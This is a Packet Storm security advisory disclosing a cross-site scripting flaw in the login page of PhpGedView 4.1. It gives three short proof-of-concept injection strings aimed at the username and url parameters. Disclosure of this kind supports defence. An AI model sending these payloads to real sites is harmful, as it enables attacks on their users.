Genealogy version 4.1 suffers from a cross site scripting vulnerability.
98d4f51db498190d6b90cab5315da9cb5321dcd2163f88f3ab309e77d7443afaVendor Site: http://www.phpgedview.net
Version: 4.1
Common Path: yoursite.com/genealogy/login.php
Overview: Genealogy program which allows you to view and edit your genealogy on your website. It fails to sufficiently sanitize user-supplied input data in "User Name" text box leaving password blank and pressing the "Login" button, also web address XSS.
Example:
1.<html><font color="Red"><b>XSS</b></font></html>
2.yoursite.com/genealogy/login.php?login.php?action=login&username="><iframe>
3.yousite.com/genealogy/login.php?url=/index.php?JOSH="><iframe>
Discovered by: Joshua Morin
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed